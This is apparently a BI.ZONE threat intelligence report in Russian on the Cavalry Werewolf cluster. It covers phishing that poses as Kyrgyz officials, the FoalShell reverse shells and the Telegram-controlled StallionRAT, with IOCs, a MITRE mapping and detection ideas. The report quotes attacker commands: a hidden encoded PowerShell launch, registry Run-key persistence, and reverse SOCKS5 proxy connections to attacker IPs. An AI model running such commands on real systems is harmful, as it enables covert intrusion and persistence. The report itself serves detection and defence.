
Cavalry Werewolf атакует Россию через доверительные отношения между государствами
Специалисты BI.ZONE Threat Intelligence зафиксировали активность кластера Cavalry Werewolf
Чтобы получить первоначальный доступ, злоумышленники запускали целенаправленные фишинговые рассылки, маскируя их под официальные письма госслужащих Кыргызстана. Основные цели атак — российские государственные учреждения, а также компании в сфере энергетики, добычи полезных ископаемых и обрабатывающей промышленности.
В выявленной активности Cavalry Werewolf полагался на вредоносные программы собственной разработки: реверс-шеллы FoalShell и трояны удаленного доступа StallionRAT с управлением через Telegram.
- Cavalry Werewolf активно экспериментирует с наполнением арсенала. Это подчеркивает, как важно оперативно получать информацию об инструментах кластера — без этого невозможно поддерживать актуальные меры по предотвращению и обнаружению подобных атак.
- Злоумышленники могут не только выдавать себя за официальных лиц, но и действительно компрометировать их почтовые ящики для фишинга. Поэтому важно внимательно проверять не только отправителя, но и содержание письма: текст, ссылки и вложения.
- То, что атаки кластера не освещают публично, не значит, что их нет. Порталы киберразведки позволяют оперативно получать актуальную информацию о ландшафте киберугроз в регионе и эффективно расставлять приоритеты в защите.
Cavalry Werewolf в целевых фишинговых рассылках на российские организации использует якобы почтовые адреса сотрудников различных ведомств Кыргызской Республики, например:
- Министерства экономики;
- Министерства культуры, информации и молодежной политики;
- Министерства транспорта и коммуникаций.
В качестве вложения в фишинговых письмах использовался RAR‑архив, содержащий вредоносное программное обеспечение FoalShell либо StallionRAT.
В одной из фишинговых рассылок атакующие использовали реальный почтовый адрес, который встречается на сайте регулятора Кыргызской Республики. Вероятно, злоумышленники скомпрометировали данный адрес ранее для использования в атаках.




Идея для гипотезы
%LocalAppData%\Microsoft\Windows\INetCache\Content.Outlook
.
FoalShell — простые реверс-шеллы, написанные на языках Go, C++, C#, применяемые Cavalry Werewolf. FoalShell позволяют атакующим выполнять произвольные команды в интерпретаторе командной строки cmd.exe
на скомпрометированном хосте.
FoalShell C#
Исходный код .NET‑приложения отличается простотой: по сути, это обычный reverse shell, который работает через cmd
с перенаправлением потоков ввода и вывода. В результате злоумышленник получает доступ к командной строке на удаленном устройстве жертвы и может выполнять любые команды. При этом окно cmd.exe
запускается в скрытом режиме. Если возникают ошибки ввода-вывода или сбои в работе сокетов, приложение автоматически прекращает выполнение.
Известные имена файлов:
О результатах трёх месяцев совместной работы [redacted].exe
Список сотрудников выдвинутых к премии ко Дню России.exe.exe
Приказ о поощрении сотрудников ко дню России (Т‑11а) № 1 от 30.05.2025.exe
О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe
О работе почтового сервера план и проведенная работа.exe
О проведении личного приема граждан список участников.exe
Службеная записка от 16.06.2025___________________________.exe
Обнаруженные PDB‑пути:
C:\Users\yaadzrr\Documents\reverseShells\Reverse-Shell-CS\Payload\Real_cli\obj\Release\Docu_rsnet.pdb
C:\Users\yueying\Documents\reverseShells\Reverse-Shell-CS\Payload\Real_cli\obj\Release\NetChecker.pdb

Благодаря идентификатору сборки 8923c4d9-3fbf-4cf3-8a63-c5102293b774
, названию пространства имен и структуре кода удалось обнаружить GitHub-репозиторий
FoalShell Cpp
В этом варианте злоумышленники использовали лаунчер на C++, содержащий шелл‑код и обфусцированный реверс-шелл FoalShell в ресурсе под именем output_bin
. При запуске ресурс считывается, для него с помощью WinAPI‑функции VirtualAlloc
с правами RWE выделяется область памяти. После этого содержимое ресурса копируется в выделенную память и происходит выполнение шелл‑кода, который деобфусцирует основной код реверс-шелла и передает ему управление с помощью WinAPI‑функции ZwResumeThread
.
Известные имена файлов:
О работе почтового сервера план и проведенная работа.exe
Программный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe
План-протокол встречи о сотрудничестве представителей должн.лиц.exe
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe
Информация по письму в МИД от 6 июля статус и прилагаемые документы.exe
О проведении личного приема граждан список участников план и проведенная работа.exe
PDB‑путь:
C:\Users\Professional\Source\Repos\bin_loader\x64\Release\bin_loader.pdb

output_bin
с нагрузкой в виде реверс‑шелла FoalShell Cpp
Основной код реверс-шелла использует сетевые сокеты, запускает в скрытом режиме cmd.exe
и перенаправляет потоки ввода-вывода в консоль, что позволяет злоумышленнику выполнять произвольные команды на удаленном хосте жертвы.

FoalShell Go
Данный вариант реверс-шелла, реализованного на Go, устанавливает соединение с удаленным сервером управления и предоставляет злоумышленнику скрытый доступ к командной строке компьютера жертвы.
Известные имена файлов:
Служебная записка от 20.08.2025[множество пробелов].exe
Служебная записка от 12.08.2025[множество пробелов].exe
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe
Путь к проекту:
C:\source\repos\ggg

Идея для гипотезы
cmd.exe
, который запускается подозрительным родительским процессом. Это могут быть:
- процессы, находящиеся в типовых для злоумышленников папках:
%Temp%
%LocalAppData%
%AppData%\Roaming
C:\Users\Public
%UserProfile%\Downloads\
%UserProfile%\Desktop
- родительские процессы с небольшим временем существования на хосте;
- процессы с именами, мимикрирующими под названия документов.
StallionRAT — трояны удаленного доступа, написанные на языках Go, PowerShell, Python, используемые Cavalry Werewolf. StallionRAT позволяют атакующим выполнять произвольные команды, загружать дополнительные файлы и производить эксфильтрацию собранных данных. В качестве командного сервера используется телеграм‑бот.
Известные имена файлов:
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe
Обнаруженный PDB-путь:
C:\Users\Admin\source\repos\ConsoleApplication3\x64\Release\ConsoleApplication3.pdb
В данной кампании атакующие использовали лаунчер, написанный на C++, для запуска экземпляра вредоносной программы StallionRAT на PowerShell. Лаунчер осуществляет запуск PowerShell с командой, закодированной Base64. Формат аргументов командной строки:
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand JABjAGgAYQB0AF8AaQBkACAAPQAgACIANwA3ADAAOQAyADIAOAAyADgANQAiAA0ACgAkA...
Выполнение указанной PowerShell-команды приводит к запуску StallionRAT, управляемого через Telegram.
Идея для детекта
powershell.exe
с параметром -EncodedCommand
, поскольку злоумышленники часто используют Base64-кодировку для обхода механизмов защиты и правил корреляции. Также активность может быть характерна для работы администраторов, но такие действия можно исключить из правила корреляции.
Идея для гипотезы
powershell.exe
с параметрами -WindowStyle Hidden
и -ExecutionPolicy Bypass
. Такими параметрами могут пользоваться злоумышленники для скрытого запуска кода и обхода механизмов защиты. Однако, в отличие от детекта выше, такие команды использует и множество легитимного ПО, которое регулярно фильтровать достаточно проблематично.
Во время инициализации StallionRAT осуществляется присвоение идентификатора DeviceID
скомпрометированному хосту. DeviceID
— это случайное число от 100 до 10 000. Также данная вредоносная программа получает имя компьютера с помощью $env:COMPUTERNAME
.
В вечном цикле (while True
) постоянно вызывается функция getUpdates
для получения новых команд и сообщений телеграм-бота. Результаты выполнения команд и сообщения об ошибках отправляются в определенный телеграм-чат, заданный в коде StallionRAT.
Команды RAT:
/list
— получает список скомпрометированных хостов, подключенных к данному C2. Возвращает список, содержащийDeviceID
и имя компьютера;/go [DeviceID] [команда]
— выполняет заданную команду с помощьюInvoke-Expression
;/upload [DeviceID]
— загружает файл на устройство жертвы с помощьюDownload-TelegramFile
и сохраняет его по путиC:\Users\Public\Libraries\%fileName%
.

После изучения дополнительной информации были обнаружены команды, выполняемые StallionRAT на одном из скомпрометированных хостов с идентификатором 9139
. Они свидетельствуют о том, что данный RAT был доставлен в каталог C:\Users\Public\Libraries
и добавлен в автозагрузку через ключ реестра Run:
'win.exe' successfully uploaded >> C:\Users\Public\Libraries\win.exe. /go9139 REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WinRVN /t REG_SZ /d C:\users\public\libraries\win.exe /f
Также были выявлены следующие команды, свидетельствующие об использовании инструментов проксирования SOCKS5 — ReverseSocks5Agent и ReverseSocks5
/go9139 C:\users\public\libraries\rev.exe -pcl 96.9.125[.]168:443 /go9139 C:\users\public\libraries\rev.exe -pcl 78.128.112[.]209:10443 /go9139 C:\users\public\libraries\revv2.exe -connect 96.9.125[.]168:443 /go9139 C:\users\public\libraries\revv2.exe -connect 78.128.112[.]209:10443
Кроме того, выполнялись команды для сбора информации о скомпрометированном хосте:
/go9139 ipconfig /all /go9139 netstat /go9139 whoami /go9139 ls C:\users\public\libraries /go9139 ping 10.70.70.10 /go9139 net user /dom
Идеи для гипотез
- поиск и анализ событий создания файлов в папке
C:\Users\Public\Libraries\
, а также событий запуска процессов из этой же папки; - поиск событий закрепления подозрительных файлов в ветке реестра
\Software\Microsoft\Windows\CurrentVersion\Run
через утилиту работы с реестромreg.exe
и командуadd
либо через функциональность отслеживания изменений реестра, которые предлагают в том числе EDR‑решения; - поиск событий изучения окружения с помощью таких команд, как
whoami
,netstat
,ipconfig
, запускаемых подозрительными родительскими процессами и пользователями, которые ранее такие команды не использовали.
В ходе исследования удалось изучить дополнительную информацию, связанную с подготовкой к атакам Cavalry Werewolf и тестированием вредоносных программ.
В первом случае зафиксированы файлы, указывающие на подготовку атаки против российских компаний, а также файл на таджикском языке C:\Users\Admin\Desktop\Номерхои коргархо new.rar
, что может свидетельствовать о нацеливании злоумышленников и на Таджикистан.
Кроме того, есть основания полагать, что, помимо выявленного нами ВПО, злоумышленники могли использовать и другие инструменты, например AsyncRAT. На это указывает путь: C:\Users\Admin\Desktop\Async Rust RAT_0.1.0_x64_en-US.msi
.

Во втором случае, помимо файлов с названиями на английском языке, обнаружены файлы с арабскими именами. Это указывает на то, что злоумышленники могут нацеливаться на страны Ближнего Востока. Таким образом, география их атак оказывается весьма широкой и не ограничивается Россией, другими странами СНГ и иными регионами, затронутыми зафиксированной нами вредоносной активностью Cavalry Werewolf.

27a11c59072a6c2f57147724e04c7d6884b52921da2629fb0807e0bb93901cbc
3cd7f621052919e937d9a2fdd4827fc7f82c0319379c46d4f9b9dd5861369ffc
c3df16cce916f1855476a2d1c4f0946fa62c2021d1016da1dc524f4389a3b6fa
e15f1a6d24b833ab05128b4b34495ef1471bd616b9833815e2e98b8d3ae78ff2
dae3c08fa3df76f54b6bae837d5abdc309a24007e9e6132a940721045e65d2bb
8404f8294b14d61ff712b60e92b7310e50816c24b38a00fcc3da1371a3367103
8e6d7c44ab66f37bf24351323dc5e8d913173425b14750a50a2cbea6d9e439ba
fa6cdd1873fba54764c52c64eadca49d52e5b79740364ef16e5d86d61538878d
0e7b65930bc73636f2f99b05a3bb0af9aaf17d3790d0107eb06992d25e62f59d
c9ffbe942a0b0182e0cd9178ac4fbf8334cae48607748d978abf47bd35104051
04769b75d7fb42fbbce39d4c4b0e9f83b60cc330efa477927e68b9bdba279bb8
7da82e14fb483a680a623b0ef69bcfbd9aaaedf3ec26f4c34922d6923159f52f
c26b62fa593d6e713f1f2ccd987ef09fe8a3e691c40eb1c3f19dd57f896d9f59
1dfe65e8dc80c59000d92457ff7053c07f272571a8920dbe8fc5c2e7037a6c98
a8ada7532ace3d72e98d1e3c3e02d1bd1538a4c5e78ce64b2fe1562047ba4e52
cc9e5d8f0b30c0aaeb427b1511004e0e4e89416d8416478144d76aa1777d1554
ec80e96e3d15a215d59d1095134e7131114f669ebc406c6ea1a709003d3f6f17
8e7fb9f6acfb9b08fb424ff5772c46011a92d80191e7736010380443a46e695c
b13b83b515ce60a61c721afd0aeb7d5027e3671494d6944b34b83a5ab1e2d9f4
af3d740c5b09c9a6237d5d54d78b5227cdaf60be89f48284b3386a3aadeb0283
4f17a7f8d2cec5c2206c3cba92967b4b499f0d223748d3b34f9ec4981461d288
22ba8c24f1aefc864490f70f503f709d2d980b9bc18fece4187152a1d9ca5fab
148a42ccaa97c2e2352dbb207f07932141d5290d4c3b57f61a780f9168783eda
7084f06f2d8613dfe418b242c43060ae578e7166ce5aeed2904a8327cd98dbdf
ab0ad77a341b12cfc719d10e0fc45a6613f41b2b3f6ea963ee6572cf02b41f4d
6b290953441b1c53f63f98863aae75bd8ea32996ab07976e498bad111d535252
cc84bfdb6e996b67d8bc812cf08674e8eca6906b53c98df195ed99ac5ec14a06
fbf1bae3c576a6fcfa86db7c36a06c2530423d487441ad2c684cfeda5cd19685
a3ec2992e6416a3af54b3aca3417cf4a109866a07df7b5ec0ace7bd1bf73f3c6
188.127.225[.]191:443
94.198.52[.]200:443
91.219.148[.]93:443
185.244.180[.]169:443
109.172.85[.]95:443
185.231.155[.]111:443
185.173.37[.]67:443
188.127.227[.]226:443
62.113.114[.]209:443
96.9.125[.]168:443
78.128.112[.]209:10443
Тактика | Техника | Процедура |
---|---|---|
Initial Access |
Phishing: Spearphishing Attachment |
Cavalry Werewolf использует вложения в фишинговые электронные письма для распространения ВПО |
Execution |
Command and Scripting Interpreter: PowerShell |
Cavalry Werewolf использует лаунчер на C++ для запуска PowerShell с закодированной Base64‑командой, содержащей код вредоносной программы StallionRAT |
Command and Scripting Interpreter: Windows Command Shell |
Cavalry Werewolf использует реверс‑шеллы FoalShell для удаленного выполнения команд в интерпретаторе |
|
User Execution: Malicious File |
Жертва должна распаковать вредоносный RAR‑архив и запустить исполняемый файл, чтобы инициировать процесс компрометации системы |
|
Persistence |
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Cavalry Werewolf добавляет StallionRAT в ключ реестра Run:
|
Defense Evasion |
Deobfuscate/Decode Files or Information |
Cavalry Werewolf использует шелл‑код из ресурса |
Hide Artifacts: Hidden Window |
Cavalry Werewolf использует в реверс‑шеллах FoalShell невидимое окно, чтобы скрыть активность, выполняемую в пользовательском интерфейсе |
|
Masquerading: Space after Filename |
Cavalry Werewolf использует множество пробелов или символ
|
|
Obfuscated Files or Information: Embedded Payloads |
Cavalry Werewolf хранит вредоносную нагрузку в секции ресурсов лаунчера на C++ |
|
Obfuscated Files or Information: Encrypted/Encoded File |
Cavalry Werewolf кодирует PowerShell‑код StallionRAT с помощью Base64 |
|
Discovery |
Account Discovery: Domain Account |
Cavalry Werewolf использует команду |
File and Directory Discovery |
Cavalry Werewolf использует команду |
|
System Information Discovery |
Cavalry Werewolf использует StallionRAT для получения имени компьютера жертвы |
|
System Network Configuration Discovery |
Cavalry Werewolf использует команды |
|
System Network Configuration Discovery: Internet Connection Discovery |
Cavalry Werewolf использует команду |
|
System Owner/User Discovery |
Cavalry Werewolf использует команду |
|
Command and Control |
Application Layer Protocol: Web Protocols |
Cavalry Werewolf использует в StallionRAT HTTPS для коммуникации с |
Ingress Tool Transfer |
Cavalry Werewolf использует StallionRAT для загрузки файлов на компьютер жертвы |
|
Non‑Application Layer Protocol |
Cavalry Werewolf использует сокеты в реверс‑шеллах FoalShell для коммуникации с управляющим сервером |
|
Proxy |
Cavalry Werewolf использует инструменты проксирования SOCKS5 — ReverseSocks5Agent и ReverseSocks5 |
|
Web Service: Bidirectional Communication |
Cavalry Werewolf использует Telegram Bot API в StallionRAT для отправки и получения сообщений |
|
Exfiltration |
Exfiltration Over Web Service |
Cavalry Werewolf использует Telegram для отправки информации о компьютере жертвы |
Рассматриваемая вредоносная активность обнаруживается следующими правилами BI.ZONE TDR:
win_suspicious_powershell_encoded_command
gen_ti_wolfs_network_ioc_was_detected
gen_ti_wolfs_hash_was_detected
win_discovery_owner_and_users_system
win_discovery_system_network_configuration
win_discovery_network_connections
win_th_start_hidden_powershell
Фишинг занимает первое место среди векторов атак: злоумышленники рассчитывают на невнимательность получателя и распространяют ВПО через электронную почту.
Для защиты почты полезны специализированные сервисы, фильтрующие нежелательные письма. Одно из таких решений — BI.ZONE Mail Security. Сразу после установки включаются более 100 механизмов защиты от спама, фишинга, спуфинга, уязвимостей почтовых серверов и атак с вредоносным ПО. Для фильтрации используются статистический, сигнатурный, лингвистический, контентный, эвристический анализ, машинное зрение. ML‑модель точно классифицирует письма по содержанию и управляет их рейтингами. В результате нелегитимные письма блокируются, а безопасные доставляются без задержек.
Чтобы выстроить эффективную киберзащиту, важно понимать, какие угрозы актуальны именно для вашей организации. Здесь помогает BI.ZONE Threat Intelligence. Портал предоставляет подробную информацию об актуальных атаках, злоумышленниках, их тактиках, техниках, инструментах, а также сведения с теневых ресурсов. Эти данные помогают проактивно защищать компанию и быстро реагировать на киберинциденты.